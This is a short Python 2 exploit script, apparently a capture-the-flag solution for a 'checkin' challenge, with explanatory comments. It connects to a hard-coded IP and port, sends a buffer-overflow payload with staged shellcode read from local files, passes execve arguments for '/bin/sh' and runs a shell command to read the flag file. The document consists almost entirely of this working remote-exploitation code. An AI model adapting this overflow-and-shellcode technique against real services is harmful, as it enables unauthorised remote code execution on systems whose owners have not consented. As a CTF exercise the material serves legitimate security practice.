- import socket
- import sys
- import time
- import struct
- import re
def R():
    """Return a single recv() of up to 4096000 bytes from the module-level socket ``sk``."""
    # ``sk`` is only read here, never rebound, so no ``global`` declaration is required.
    chunk = sk.recv(4096000)
    return chunk
def S(x):
    """Send ``x`` on the module-level socket ``sk`` and return send()'s byte count.

    Note: a plain send() may write fewer bytes than len(x); the caller ignores the count.
    """
    written = sk.send(x)
    return written
def PQ(x):
    """Pack ``x`` as one native-byte-order unsigned 64-bit integer (8 bytes).

    Raises struct.error when ``x`` is negative or does not fit in 64 bits.
    """
    packer = struct.Struct('Q')
    return packer.pack(x)
# Script body (Python 2: ``print`` statement, str payloads). One TCP
# connection is opened and four fixed messages are written in order; the
# script paces them with sleeps instead of reading the server's replies, so
# timing is the only sequencing it has. Neither opened file is closed.
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.connect(('202.120.7.73',44445))
# Message 1: 22 bytes taken from file 'a' at offset 0x80 (presumably a
# pre-built binary blob -- the file itself is not on this page).
sh = open('a','rb').read()[0x80:0x80+22]
print R()  # print whatever the service sends first (banner/prompt)
S(sh+'\x0d\x07\x40\x00\x00\x00\x00\x00') # send shellcode1 + buffer overflow (22-byte blob followed by 8 fixed bytes)
time.sleep(0.5)
# Message 2: 100 bytes taken from file 'b' at offset 0x80, preceded by 18 filler 'A' bytes.
sh = open('b','rb').read()[0x80:0x80+100]
S('A'*18+sh) # send shellcode2
time.sleep(0.5)
# Message 3: two native-order 8-byte integers (0x601028 and 0) followed by
# the NUL-terminated string "/bin/sh".
S(PQ(0x601028)+PQ(0)+'/bin/sh\x00') # send the arguments for execve
time.sleep(0.5)
# Message 4: a newline-terminated shell command; the reply is printed and
# the connection closed.
S('cat /home/checkin/flag_is_here_with_a_very_long_name\n') # send shell cmd
print R()
sk.close()